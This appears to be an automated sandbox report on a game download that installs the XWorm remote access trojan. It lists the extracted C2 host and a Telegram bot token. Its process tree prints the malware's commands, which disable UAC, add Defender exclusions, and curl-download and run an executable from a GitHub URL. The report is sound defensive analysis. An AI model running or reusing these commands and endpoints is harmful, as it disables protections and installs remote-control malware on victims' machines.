Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://gamejolt.com...

windows11-21h2-x64

10

Analysis

  • max time kernel
    111s
  • max time network
    117s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    03/03/2025, 07:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://gamejolt.com/games/Station-17/945765

Score
10/10
xwormdefense_evasiondiscoveryexecutionpyinstallerrattrojan

Malware Config

Extracted

Family

xworm

C2

king-recruiting.gl.at.ply.gg:6182

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7856884927:AAG6kZGLpszPeQUtFedd02qh_J_SKDZZfSI/sendMessage?chat_id=7075619698

Signatures

  • Detect Xworm Payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    defense_evasiontrojan
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gamejolt.com/games/Station-17/945765
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97f8a3cb8,0x7ff97f8a3cc8,0x7ff97f8a3cd8
      2⤵
        PID:4516
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2100 /prefetch:2
        2⤵
          PID:3000
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
          2⤵
          • Downloads MZ/PE file
          • Suspicious behavior: EnumeratesProcesses
          PID:1876
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
          2⤵
            PID:5088
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
            2⤵
              PID:1424
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
              2⤵
                PID:4448
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1308
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
                2⤵
                  PID:2728
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
                  2⤵
                    PID:2216
                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6092 /prefetch:8
                    2⤵
                      PID:1924
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6092 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4792
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
                      2⤵
                        PID:2036
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
                        2⤵
                          PID:3408
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
                          2⤵
                            PID:3260
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
                            2⤵
                              PID:660
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
                              2⤵
                                PID:1996
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
                                2⤵
                                  PID:1308
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6364 /prefetch:8
                                  2⤵
                                    PID:4596
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
                                    2⤵
                                      PID:1924
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6800 /prefetch:1
                                      2⤵
                                        PID:2276
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7164 /prefetch:8
                                        2⤵
                                          PID:3560
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7236 /prefetch:1
                                          2⤵
                                            PID:3400
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
                                            2⤵
                                            • Subvert Trust Controls: Mark-of-the-Web Bypass
                                            • NTFS ADS
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4704
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7744 /prefetch:8
                                            2⤵
                                            • NTFS ADS
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1020
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
                                            2⤵
                                              PID:2056
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1
                                              2⤵
                                                PID:4924
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4464126306330890293,15206374020177524826,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7328 /prefetch:1
                                                2⤵
                                                  PID:1504
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:4020
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:2664
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                    1⤵
                                                      PID:3840
                                                    • C:\Windows\system32\AUDIODG.EXE
                                                      C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C8
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3508
                                                    • C:\Windows\System32\rundll32.exe
                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                      1⤵
                                                        PID:2404
                                                      • C:\Users\Admin\Downloads\somethingbadisonthemoonwindows\SomethingBadIsOnTheMoonWindows\SomethingBadIsOnTheMoon.exe
                                                        "C:\Users\Admin\Downloads\somethingbadisonthemoonwindows\SomethingBadIsOnTheMoonWindows\SomethingBadIsOnTheMoon.exe"
                                                        1⤵
                                                          PID:3928
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Admin\AppData\Local\Temp\temp_script.bat""
                                                            2⤵
                                                              PID:4924
                                                              • C:\Windows\system32\net.exe
                                                                net session
                                                                3⤵
                                                                  PID:4468
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 session
                                                                    4⤵
                                                                      PID:3528
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic os get localdatetime /value"
                                                                    3⤵
                                                                      PID:1748
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic os get localdatetime /value
                                                                        4⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2184
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                                      3⤵
                                                                      • UAC bypass
                                                                      PID:756
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\SteamConfig\070703032520.exe'"
                                                                      3⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4500
                                                                    • C:\Windows\system32\curl.exe
                                                                      curl -L -o "C:\Users\Admin\AppData\Local\SteamConfig\070703032520.exe" "https://github.com/sirfedsalot/DO-NOT-RUN/raw/refs/heads/main/vmtest.exe"
                                                                      3⤵
                                                                      • Downloads MZ/PE file
                                                                      PID:3132
                                                                    • C:\Users\Admin\AppData\Local\SteamConfig\070703032520.exe
                                                                      "C:\Users\Admin\AppData\Local\SteamConfig\070703032520.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2360
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\SteamConfig\070703032520.exe'
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4920
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '070703032520.exe'
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        PID:4924
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\configmanager'
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        PID:2244
                                                                  • C:\Users\Admin\Downloads\somethingbadisonthemoonwindows\SomethingBadIsOnTheMoonWindows\SomethingBadIsOnTheMoonWindows\SomethingBadIsOnTheMoon.exe
                                                                    "SomethingBadIsOnTheMoonWindows\SomethingBadIsOnTheMoon.exe"
                                                                    2⤵
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:4428
                                                                    • C:\Users\Admin\Downloads\somethingbadisonthemoonwindows\SomethingBadIsOnTheMoonWindows\SomethingBadIsOnTheMoonWindows\UnityCrashHandler64.exe
                                                                      "C:\Users\Admin\Downloads\somethingbadisonthemoonwindows\SomethingBadIsOnTheMoonWindows\SomethingBadIsOnTheMoonWindows\UnityCrashHandler64.exe" --attach 4428 3098758221824
                                                                      3⤵
                                                                        PID:2896

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v15

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    627073ee3ca9676911bee35548eff2b8

                                                                    SHA1

                                                                    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                    SHA256

                                                                    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                    SHA512

                                                                    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                    Filesize

                                                                    152B

                                                                    MD5

                                                                    46ec2d399c9d10a0545cb514e47de14e

                                                                    SHA1

                                                                    98fc6f3f34f4082b8d81cc50dc571ec06eb454ca

                                                                    SHA256

                                                                    f50fff32b15e4b61c3cb18655c3daf46a83556aef1f3ff8d9ed074f298f247a5

                                                                    SHA512

                                                                    993b723da7b0ffcaa731a1f06057bf2ebdc2fd518ef8765b4f625b9fd0094cc6abdccfe998d0e6cb760a3e5d6c411b197a47e67c1de5a6ec4315d017a552a2be

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                    Filesize

                                                                    152B

                                                                    MD5

                                                                    a1ea058d6231b47f5bb8557adba13351

                                                                    SHA1

                                                                    111dbb6ffff6517e11719a20683fd7f4ef0579d2

                                                                    SHA256

                                                                    f5a91a0770c54a1601557b8babfcc7813972275da171c384cc8929d2910a851f

                                                                    SHA512

                                                                    e613f481c50b5a7022a763d13ac1b1ebb6a9d4d973de95108d95d23844d9d526d8c90f391493f043e86e22e9a5abd8a3a4cab5f2def248033d0eb9421091889b

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    d4698a67e83c586e84bfe40b34009dba

                                                                    SHA1

                                                                    56ddfeebde812d74835e5bde926f5e26e7b051f7

                                                                    SHA256

                                                                    8a752a74cdfcaa462c857ce8c39520b3a588464ad6627c99d57ad31ae31233bb

                                                                    SHA512

                                                                    bd5a85dc1282d83e13ee1f045993b864d578284087cffc7762cd8f64a98b14a6008342d1e8e6fbc32f1ae7bc9325d01fd11869281f085786f82ab714ad8c4aa9

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                    Filesize

                                                                    111B

                                                                    MD5

                                                                    285252a2f6327d41eab203dc2f402c67

                                                                    SHA1

                                                                    acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                    SHA256

                                                                    5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                    SHA512

                                                                    11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                    Filesize

                                                                    5KB

                                                                    MD5

                                                                    8f5c88e8d0383f17f34f9145364e5b07

                                                                    SHA1

                                                                    8b8458687e14d10b2df0cd833a402b609eeb1cc8

                                                                    SHA256

                                                                    4ba299ea520c0d8b3fa71113ea35e8452081c91255fd781c1be9cc37a7907065

                                                                    SHA512

                                                                    284a30e335ad9f424b5792804d269d5e3a6b4a50b29934e9b4a299022acf04490e367d746dc282ef6d7fe90c6a73d15bf311b4371eb1f75fd021b4ceaeaf2206

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                    Filesize

                                                                    5KB

                                                                    MD5

                                                                    f098795dd6242ba0ed0c67b8889e350f

                                                                    SHA1

                                                                    e7fa9fb98be9cc0aa2277ee86033016e2d22178b

                                                                    SHA256

                                                                    2dade5e64b768d9c70a87d008299a0514c3d2dadad3f455d7768cc06f28b27f9

                                                                    SHA512

                                                                    cb93bbc6296bbbf8364ba6b02915a3a71346c237768a7ae1067151314cf45d641e1ecedd529dcb40f813665ca7c4cf936484dfba903b0c379ba47d7711e5553e

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                    Filesize

                                                                    6KB

                                                                    MD5

                                                                    dbe054007fb0fa6fb799602bc77d661f

                                                                    SHA1

                                                                    cac72ee0adde261fe42e60073b8a15f278dc986a

                                                                    SHA256

                                                                    7d8e4acb1ccfd6236ce8647b04a330671121df917d4c49e89df0bf335045568a

                                                                    SHA512

                                                                    57d675ddf2306f469ae30cb336147a17b9e78899331246fb9821cbfd30fd4bb86278bcdb0560f431e444c40f30dc21ea761df2c11796cac6932f95c888112efe

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                    Filesize

                                                                    7KB

                                                                    MD5

                                                                    9dc6d0837c78a12f79bcb6e7f7eca74a

                                                                    SHA1

                                                                    01cf3357cf41d6bb5136da92a985934e463f2448

                                                                    SHA256

                                                                    6adf287558b84aeb2b5345ad8638f7af2d0481d9952054b65fb5ce136a820226

                                                                    SHA512

                                                                    1fbe21d34791a9be7081102bec5669576bed538dc4c31e54ed44db0616ffba6e54dc51072d4b18e9db4b1ad14e5d9b650ec43bcbcac5b79d58c600e33460740a

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                    Filesize

                                                                    7KB

                                                                    MD5

                                                                    62edc0f3eb5eab0b7f6b42e41967dadb

                                                                    SHA1

                                                                    71ba3cad8234341bb31e2bcb4656083fbd876754

                                                                    SHA256

                                                                    c78aec8fd6f152c35c48880da1c52d091e59bc07431626e390185670913232ee

                                                                    SHA512

                                                                    be1d32aeb107dc415e1e43681536aadc40f11dcf9b8550bdd4c4dad21bf0037d11d9735ca2d2f35b558dd342f2cbf5dee41b4d29e8b9d32297ec8db9c567a59d

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                    Filesize

                                                                    7KB

                                                                    MD5

                                                                    964cd52eb14e0cc5b92af31355046f67

                                                                    SHA1

                                                                    9c20b9a88338fa41c9d6934a42bb801ba26a92c7

                                                                    SHA256

                                                                    07b797018e4e09376eb1b6208033fe5774beda90bd5bdcb2373464fd7131a88b

                                                                    SHA512

                                                                    0d001a0d22309c9c6765bff62ff19e0b201d96c4acc2aefbb7cc769ab8892f0c007b88198df01ee29cbe91781bde37a9d0d8a97c142e5ad99480984946d746af

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                    Filesize

                                                                    16B

                                                                    MD5

                                                                    46295cac801e5d4857d09837238a6394

                                                                    SHA1

                                                                    44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                    SHA256

                                                                    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                    SHA512

                                                                    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                    Filesize

                                                                    16B

                                                                    MD5

                                                                    206702161f94c5cd39fadd03f4014d98

                                                                    SHA1

                                                                    bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                    SHA256

                                                                    1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                    SHA512

                                                                    0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                    Filesize

                                                                    11KB

                                                                    MD5

                                                                    37a3045a3f1eb6c5936c8b8411a1ce25

                                                                    SHA1

                                                                    5fa738f2c0dfadeefe671815681702432a870a57

                                                                    SHA256

                                                                    1214b97a8b18b49a6949f4331c47cdec769aef7c46de9373ad74f4b20de867cd

                                                                    SHA512

                                                                    c3adfd9865bbc70ce0dcde61d9bb39cdf72c4b26dfeb26836d93c776a2fdb5e2d5856e95f2c5e22393ab5ccff07d7bcf75c96552f2436b8698a6d1904e6f4602

